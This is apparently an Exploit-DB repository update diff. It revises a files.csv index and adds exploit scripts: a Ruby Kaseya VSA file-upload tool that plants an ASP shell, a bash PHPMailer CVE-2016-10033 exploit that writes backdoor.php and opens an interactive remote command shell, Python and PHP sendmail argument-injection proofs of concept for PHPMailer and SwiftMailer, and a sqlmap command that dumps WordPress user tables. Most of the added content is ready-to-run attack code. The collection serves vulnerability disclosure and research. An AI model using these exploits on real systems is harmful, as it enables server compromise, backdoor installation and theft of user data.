DB: 2016-12-29

4 new exploits

analogx SimpleServer:WWW 1.0.6 - Directory Traversal
AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal

My PHP Dating - 'success_story.php id' SQL Injection
My PHP Dating - 'id' Parameter SQL Injection

Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection
Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection

Roundcube 1.1.3 - Directory Traversal
Roundcube Webmail 1.1.3 - Directory Traversal

PHPMailer 5.2.17 - Remote Code Execution
PHPMailer < 5.2.18 - Remote Code Execution (Bash)
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
PHPMailer < 5.2.20 - Remote Code Execution
WordPress Plugin Simply Poll 1.4.1 - SQL Injection
SwiftMailer < 5.4.5-DEV - Remote Code Execution

files.csv

@@ -11631,7 +11631,7 @@ id,file,description,date,author,platform,type,port
 20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - Exploits",2000-07-20,"kevin j",multiple,remote,0
 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote,0
 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote,0
-20103,platforms/windows/remote/20103.txt,"analogx SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0
+20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0
 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0
 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0
 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0
@@ -19680,7 +19680,7 @@ id,file,description,date,author,platform,type,port
 6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - SQL Injection",2008-10-14,EcHoLL,php,webapps,0
 6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
-6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0
+6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
 6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
@@ -25012,7 +25012,7 @@ id,file,description,date,author,platform,type,port
 17973,platforms/php/webapps/17973.txt,"WordPress Plugin GD Star Rating 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0
 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0
-17957,platforms/php/webapps/17957.txt,"Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0
+17957,platforms/php/webapps/17957.txt,"Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0
 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0
 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0
 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures - (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0
@@ -36339,7 +36339,7 @@ id,file,description,date,author,platform,type,port
 39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0
 39241,platforms/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848
 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80
-39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80
+39245,platforms/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0
 39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0
@@ -36921,4 +36921,8 @@ id,file,description,date,author,platform,type,port
 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
 40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
 40966,platforms/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,php,webapps,0
-40968,platforms/php/webapps/40968.php,"PHPMailer 5.2.17 - Remote Code Execution",2016-12-26,"Dawid Golunski",php,webapps,0
+40968,platforms/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",php,webapps,0
+40970,platforms/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",php,webapps,0
+40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0
+40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0
+40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0

platforms/asp/webapps/38351.txt

@@ -164,4 +164,179 @@ Nw5BxwW4Z7zCSHgBI6CYUTZQ0QvZFVZXOkix6+GnslzDwXu6m1cnY+PXa5K5jJtm
 /BMO8WVUvwPdUAeRMTweggoXOModWC/56BZNgquxTkayz2r9c7AdEr0aZDLYIxr0
 OHLrGsL5XSDW9txZqDl9
 =rF0G
------END PGP SIGNATURE-----
+-----END PGP SIGNATURE-----
+
+
+
+
+
+
+
+
+
+
+#!/usr/bin/ruby
+#
+# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
+# ===================
+# by Pedro Ribeiro <pedrib@gmail.com> / Agile Information Security
+# Disclosure date: 28/09/2015
+#
+# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
+#
+# execjs and mechanize gems are required to run this exploit
+#
+# According to Kaseya's advisory, this exploit should work for the following VSA versions:
+# VSA Version 7.0.0.0 – 7.0.0.32
+# VSA Version 8.0.0.0 – 8.0.0.22
+# VSA Version 9.0.0.0 – 9.0.0.18
+# VSA Version 9.1.0.0 – 9.1.0.8
+# This exploit has been tested with v8 and v9.
+#
+# Check out these two companion vulnerabilities, both of which have Metasploit modules:
+# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
+# - Unauthenticated remote  privilege escalation (CVE-2015-6922 / ZDI-15-448)
+#
+# This code is released under the GNU General Public License v3
+# http://www.gnu.org/licenses/gpl-3.0.html
+# 
+
+require 'execjs'
+require 'mechanize'
+require 'open-uri'
+require 'uri'
+require 'openssl'
+
+# avoid certificate errors
+OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE 
+I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
+
+# Fixes a Mechanize bug, see
+# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
+class Mechanize::HTTP::Agent
+  MAX_RESET_RETRIES = 10
+
+  # We need to replace the core Mechanize HTTP method:
+  #
+  #   Mechanize::HTTP::Agent#fetch
+  #
+  # with a wrapper that handles the infamous "too many connection resets"
+  # Mechanize bug that is described here:
+  #
+  #   https://github.com/sparklemotion/mechanize/issues/123
+  #
+  # The wrapper shuts down the persistent HTTP connection when it fails with
+  # this error, and simply tries again. In practice, this only ever needs to
+  # be retried once, but I am going to let it retry a few times
+  # (MAX_RESET_RETRIES), just in case.
+  #
+  def fetch_with_retry(
+    uri,
+    method    = :get,
+    headers   = {},
+    params    = [],
+    referer   = current_page,
+    redirects = 0
+  )
+    action      = "#{method.to_s.upcase} #{uri.to_s}"
+    retry_count = 0
+
+    begin
+      fetch_without_retry(uri, method, headers, params, referer, redirects)
+    rescue Net::HTTP::Persistent::Error => e
+      # Pass on any other type of error.
+      raise unless e.message =~ /too many connection resets/
+
+      # Pass on the error if we've tried too many times.
+      if retry_count >= MAX_RESET_RETRIES
+        puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
+        raise
+      end
+
+      # Otherwise, shutdown the persistent HTTP connection and try again.
+      # puts "**** WARN: Mechanize retrying connection reset error: #{action}"
+      retry_count += 1
+      self.http.shutdown
+      retry
+    end
+  end
+
+  # Alias so #fetch actually uses our new #fetch_with_retry to wrap the
+  # old one aliased as #fetch_without_retry.
+  alias_method :fetch_without_retry, :fetch
+  alias_method :fetch, :fetch_with_retry
+end
+
+if ARGV.length < 4
+  puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
+  exit -1
+end
+
+host = ARGV[0]
+username = ARGV[1]
+password = ARGV[2]
+shell_file = ARGV[3]
+
+login_url = host + '/vsapres/web20/core/login.aspx'
+agent = Mechanize.new
+
+# 1- go to the login URL, get a session cookie and the challenge.
+page = agent.get(login_url)
+login_form = page.forms.first
+challenge = login_form['loginFormControl$ChallengeValueField']
+
+# 2- calculate the password hashes with the challenge
+source = open(host + "/inc/sha256.js").read
+source += open(host + "/inc/coverPass.js").read
+source += open(host + "/inc/coverPass256.js").read
+source += open(host + "/inc/coverData.js").read
+source += open(host + "/inc/passwordHashes.js").read
+source.gsub!(/\<\!--(\s)*\#include.*--\>/, "")          # remove any includes, this causes execjs to fail
+context = ExecJS.compile(source)
+hashes = context.call("getHashes",username,password,challenge)
+
+# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
+# We need the following input values to login:
+#   - __EVENTTARGET (empty)
+#   - __EVENTARGUMENT (empty)
+#   - __VIEWSTATE (copied from the original GET request)
+#   - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
+#   - __EVENTVALIDATION (copied from the original GET request)
+#   - loginFormControl$UsernameTextbox (username)
+#   - loginFormControl$PasswordTextbox (empty)
+#   - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
+#   - loginFormControl$SHA1Field (output from getHashes)
+#   - loginFormControl$RawSHA1Field (output from getHashes)
+#   - loginFormControl$SHA256Field (output from getHashes)
+#   - loginFormControl$RawSHA256Field (output from getHashes)
+#   - loginFormControl$ChallengeValueField (copied from the original GET request)
+#   - loginFormControl$TimezoneOffset ("0")
+#   - loginFormControl$ScreenHeight (any value between 800 - 2048)
+#   - loginFormControl$ScreenWidth (any value between 800 - 2048)
+login_form['__EVENTTARGET'] = ''
+login_form['__EVENTARGUMENT'] = ''
+login_form['loginFormControl$UsernameTextbox'] = username
+login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
+login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
+login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
+login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
+login_form['loginFormControl$TimezoneOffset'] = 0
+login_form['loginFormControl$SubmitButton'] = 'Logon'
+login_form['loginFormControl$screenHeight'] = rand(800..2048)
+login_form['loginFormControl$screenWidth'] = rand(800..2048)
+page = agent.submit(login_form)
+web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
+
+# 4- upload the file using the ReferringWebWindowId
+page = agent.post('/vsapres/web20/json.ashx', 
+  'directory' => "../WebPages",
+  'ReferringWebWindowId' => web_windowId,
+  'request' => 'uploadFile',
+  'impinf__uploadfilelocation' => File.open(shell_file)
+)
+
+if page.code == "200"
+  puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
+else
+  puts "Error occurred, shell was not uploaded correctly..."
+end

platforms/php/webapps/40968.php

@@ -1,79 +1,27 @@
-<?php
+#!/bin/bash
+# CVE-2016-10033 exploit by opsxcq
+# https://github.com/opsxcq/exploit-CVE-2016-10033
 
-/*
+echo '[+] CVE-2016-10033 exploit by opsxcq'
 
-PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
+if [ -z "$1" ]
+then
+    echo '[-] Please inform an host as parameter'
+    exit -1
+fi
 
-Discovered/Coded by:
+host=$1
 
-Dawid Golunski (@dawid_golunski)
-https://legalhackers.com
-
-Full Advisory URL:
-https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
-
-
-A simple PoC (working on Sendmail MTA)
-
-It will inject the following parameters to sendmail command:
-
-Arg no. 0 == [/usr/sbin/sendmail]
-Arg no. 1 == [-t]
-Arg no. 2 == [-i]
-Arg no. 3 == [-fattacker\]
-Arg no. 4 == [-oQ/tmp/]
-Arg no. 5 == [-X/var/www/cache/phpcode.php]
-Arg no. 6 == [some"@email.com]
-
-
-which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
-The resulting file will contain the payload passed in the body of the msg:
-
-09607 <<< --b1_cb4566aa51be9f090d9419163e492306
-09607 <<< Content-Type: text/html; charset=us-ascii
-09607 <<< 
-09607 <<< <?php phpinfo(); ?>
-09607 <<< 
-09607 <<< 
-09607 <<< 
-09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
-
-
-See the full advisory URL for details.
-
-*/
-
-
-// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
-// For example from a Contact form
-
-$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
-$msg_body  = "<?php phpinfo(); ?>";
-
-// ------------------
-
-
-// mail() param injection via the vulnerability in PHPMailer
-
-require_once('class.phpmailer.php');
-$mail = new PHPMailer(); // defaults to using php "mail()"
-
-$mail->SetFrom($email_from, 'Client Name');
-
-$address = "customer_feedback@company-X.com";
-$mail->AddAddress($address, "Some User");
-
-$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
-$mail->MsgHTML($msg_body);
-
-if(!$mail->Send()) {
-  echo "Mailer Error: " . $mail->ErrorInfo;
-} else {
-  echo "Message sent!\n";
-}
-    
-
-
-?>
+echo '[+] Exploiting '$host
 
+curl -sq 'http://'$host -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
 
+cmd='whoami'
+while [ "$cmd" != 'exit' ]
+do
+    echo '[+] Running '$cmd
+    curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
+    echo
+    read -p 'RemoteShell> ' cmd
+done
+echo '[+] Exiting'

platforms/php/webapps/40969.pl

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+intro = """
+PHPMailer RCE PoC Exploits
+
+PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
++
+PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
+(the bypass of the first patch for CVE-2016-10033)
+
+Discovered and Coded by:
+
+ Dawid Golunski
+ @dawid_golunski
+ https://legalhackers.com
+
+"""
+usage = """
+Usage:
+
+Full Advisory:
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
+
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
+
+PoC Video:
+https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
+
+Disclaimer:
+For testing purposes only. Do no harm.
+
+"""
+
+import time
+import urllib
+import urllib2
+import socket
+import sys
+
+RW_DIR = "/var/www/html/uploads"
+
+url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
+
+# Choose/uncomment one of the payloads:
+
+# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php  some"@email.com' % RW_DIR
+
+# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
+payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php  some\"@email.com" % RW_DIR
+
+######################################
+
+# PHP code to be saved into the backdoor php file on the target in RW_DIR
+RCE_PHP_CODE = "<?php phpinfo(); ?>"
+
+post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
+
+# Attack
+data = urllib.urlencode(post_fields)
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+the_page = response.read()
+

platforms/php/webapps/40970.php

@@ -0,0 +1,75 @@
+<?php
+
+/*
+
+PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
+
+Discovered/Coded by:
+
+Dawid Golunski (@dawid_golunski)
+https://legalhackers.com
+
+Full Advisory URL:
+https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
+
+
+A simple PoC (working on Sendmail MTA)
+
+It will inject the following parameters to sendmail command:
+
+Arg no. 0 == [/usr/sbin/sendmail]
+Arg no. 1 == [-t]
+Arg no. 2 == [-i]
+Arg no. 3 == [-fattacker\]
+Arg no. 4 == [-oQ/tmp/]
+Arg no. 5 == [-X/var/www/cache/phpcode.php]
+Arg no. 6 == [some"@email.com]
+
+
+which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
+The resulting file will contain the payload passed in the body of the msg:
+
+09607 <<< --b1_cb4566aa51be9f090d9419163e492306
+09607 <<< Content-Type: text/html; charset=us-ascii
+09607 <<< 
+09607 <<< <?php phpinfo(); ?>
+09607 <<< 
+09607 <<< 
+09607 <<< 
+09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
+
+
+See the full advisory URL for details.
+
+*/
+
+
+// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
+// For example from a Contact form
+
+$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
+$msg_body  = "<?php phpinfo(); ?>";
+
+// ------------------
+
+
+// mail() param injection via the vulnerability in PHPMailer
+
+require_once('class.phpmailer.php');
+$mail = new PHPMailer(); // defaults to using php "mail()"
+
+$mail->SetFrom($email_from, 'Client Name');
+
+$address = "customer_feedback@company-X.com";
+$mail->AddAddress($address, "Some User");
+
+$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
+$mail->MsgHTML($msg_body);
+
+if(!$mail->Send()) {
+  echo "Mailer Error: " . $mail->ErrorInfo;
+} else {
+  echo "Message sent!\n";
+}
+    
+?>

platforms/php/webapps/40971.txt

@@ -0,0 +1,64 @@
+# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress ­ SQL Injection
+# Date: 21/12/2016
+# Exploit Author: TAD GROUP
+# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
+# Software Link: https://wordpress.org/plugins/simply-poll/
+# Contact: info@tad.bg
+# Website: http://tad.bg <http://tad.bg/>
+# Category: Web Application Exploits
+
+1 - Description
+
+An unescaped parameter was found in Simply Poll version 1.4.1. ( WP
+plugin ). An attacker can exploit this vulnerability to read from the
+database.
+The POST parameter 'pollid' is vulnerable.
+
+
+2. Proof of Concept
+
+  sqlmap -u "http://example.com/wp-admin/admin-ajax.php"
+--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress
+--threads=10 --random-agent --dbms=mysql --level=5 --risk=3
+
+Parameter: pollid (POST)
+     Type: boolean-based blind
+     Title: AND boolean-based blind - WHERE or HAVING clause
+     Payload: action=spAjaxResults&pollid=2 AND 6034=6034
+
+     Type: AND/OR time-based blind
+     Title: MySQL >= 5.0.12 AND time-based blind
+     Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)
+
+     Type: UNION query
+     Title: Generic UNION query (NULL) - 7 columns
+     Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a634844657
+9564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL--
+CfNO
+
+
+3. Attack outcome:
+
+An attacker can read arbitrary data from the database. If the webserver
+is misconfigured, read & write access the filesystem may be possible.
+
+
+4 Impact:
+
+Critical
+
+
+5. Affected versions:
+
+<= 1.4.1
+
+6. Disclosure Timeline:
+
+21-Dec-2016 ­ found the vulnerability
+21-Dec-2016 ­ informed the developer
+28-Dec-2016 ­ release date of this security advisory
+
+Not fixed at the date of submitting that exploit.
+
+

platforms/php/webapps/40972.php

@@ -0,0 +1,78 @@
+<?php
+ 
+/*
+ 
+SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
+ 
+Discovered/Coded by:
+ 
+Dawid Golunski
+https://legalhackers.com
+ 
+Full Advisory URL:
+https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
+
+Exploit code URL:
+https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
+
+Follow the feed for updates:
+
+https://twitter.com/dawid_golunski
+
+ 
+A simple PoC (working on Sendmail MTA)
+ 
+It will inject the following parameters to sendmail command:
+ 
+Arg no. 0 == [/usr/sbin/sendmail]
+Arg no. 1 == [-t]
+Arg no. 2 == [-i]
+Arg no. 3 == [-fattacker\]
+Arg no. 4 == [-oQ/tmp/]
+Arg no. 5 == [-X/var/www/cache/phpcode.php]
+Arg no. 6 == ["@email.com]
+
+
+which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
+Note /var/www/cache must be writable by www-data web user.
+
+The resulting file will contain the payload passed in the body of the msg:
+ 
+09607 <<< Content-Type: text/html; charset=us-ascii
+09607 <<< 
+09607 <<< <?php phpinfo(); ?>
+09607 <<< 
+09607 <<< 
+09607 <<< 
+ 
+ 
+See the full advisory URL for the exploit details.
+ 
+*/
+ 
+ 
+// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
+// For example from a Contact form with sender field
+ 
+$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
+
+// ------------------
+ 
+// mail() param injection via the vulnerability in SwiftMailer
+
+require_once 'lib/swift_required.php';
+// Mail transport
+$transport = Swift_MailTransport::newInstance();
+// Create the Mailer using your created Transport
+$mailer = Swift_Mailer::newInstance($transport);
+
+// Create a message
+$message = Swift_Message::newInstance('Swift PoC exploit')
+  ->setFrom(array($email_from => 'PoC Exploit Payload'))
+  ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
+  ->setBody('Here is the message itself')
+  ;
+// Send the message with PoC payload in 'from' field
+$result = $mailer->send($message);
+
+?>